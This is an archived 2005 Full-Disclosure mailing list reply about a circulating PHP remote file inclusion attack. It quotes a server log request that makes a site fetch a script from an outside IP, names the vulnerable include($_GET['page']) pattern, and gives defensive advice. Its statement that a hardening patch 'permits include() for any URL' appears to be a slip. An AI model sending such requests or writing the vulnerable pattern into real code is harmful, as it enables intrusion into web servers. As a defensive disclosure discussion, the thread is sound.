Re: [Full-disclosure] PHP Command/Safemode Exploit

From: Christopher Kunz (christopher.kunz_at_hardened-php.net)
Date: 07/29/05

  • Next message: Valdis.Kletnieks_at_vt.edu: "Re: [Full-disclosure] Cisco IOS Shellcode Presentation" 
    Date: Fri, 29 Jul 2005 23:02:52 +0200
To: Willem Koenings <infsec@gmail.com>

    Willem Koenings wrote:
    > hi,
    >
    > looks like CSE exploit is circulating again...
    > found several queries today from server log
    > anyone confirms?
    >
    > "GET /index.php?page=http://213.202.214.198/cse.gif? HTTP/1.1" 404
    > 1035 "-" "Python-urllib/2.4"

    Can't see anything new in there. The usual PHP exploit suite, which is very
    script kiddie compatible, but where do you suspect a new exploit? AFAICT, this
    is targetted to sites using stuff like

    include($_GET['page'])

    as their action dispatch inside the script.

    If you filter user input correctly, there's absolutely nothing to worry. You
    might, however, want to check out the Hardening Patch for PHP
    (http://www.hardened-php.net/, shameless plug) which permits include() for any
    URL, or disable allow_url_fopen in php.ini.

    Regards,

    --ck

    PS: The site with cse.gif on it is down now.
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.grok.org.uk/full-disclosure-charter.html
    Hosted and sponsored by Secunia - http://secunia.com/

  • Next message: Valdis.Kletnieks_at_vt.edu: "Re: [Full-disclosure] Cisco IOS Shellcode Presentation"